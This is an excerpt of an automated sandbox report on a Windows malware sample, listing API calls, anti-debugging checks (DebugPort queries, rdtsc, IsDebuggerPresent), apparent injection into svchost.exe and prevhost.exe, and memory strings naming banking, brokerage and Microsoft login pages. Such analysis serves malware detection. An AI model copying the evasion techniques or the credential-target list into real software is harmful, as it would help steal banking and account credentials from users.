                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0058698F
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D076
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D3A9
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00589642
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0058979D
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00589B2B
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00585C97
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6C7C0 FindFirstFileW,FindNextFileW,FindClose,5_2_02F6C7C0
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                Source: al6P40S6.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: al6P40S6.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: al6P40S6.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: al6P40S6.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: al6P40S6.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: al6P40S6.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: al6P40S6.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: YZKoIsKkwLJWPq.exe, 00000006.00000002.3315257400.000000000158F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: al6P40S6.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: al6P40S6.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: al6P40S6.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: al6P40S6.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: al6P40S6.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: al6P40S6.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: al6P40S6.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: al6P40S6.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: al6P40S6.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: al6P40S6.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: al6P40S6.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: al6P40S6.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: al6P40S6.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: firefox.exe, 00000008.00000002.2694761071.00000216086BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllllX
                Source: al6P40S6.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: al6P40S6.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: al6P40S6.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F7C13 LdrLoadDll,2_2_024F7C13
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058EAA2 BlockInput,0_2_0058EAA2
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00542622
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00534CE8 mov eax, dword ptr fs:[00000030h]0_2_00534CE8
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_016028F0 mov eax, dword ptr fs:[00000030h]0_2_016028F0
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_01603F60 mov eax, dword ptr fs:[00000030h]0_2_01603F60
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_01603F00 mov eax, dword ptr fs:[00000030h]0_2_01603F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]2_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]2_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]2_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]2_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]2_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]2_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]2_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]2_2_02FEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]2_2_02FD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
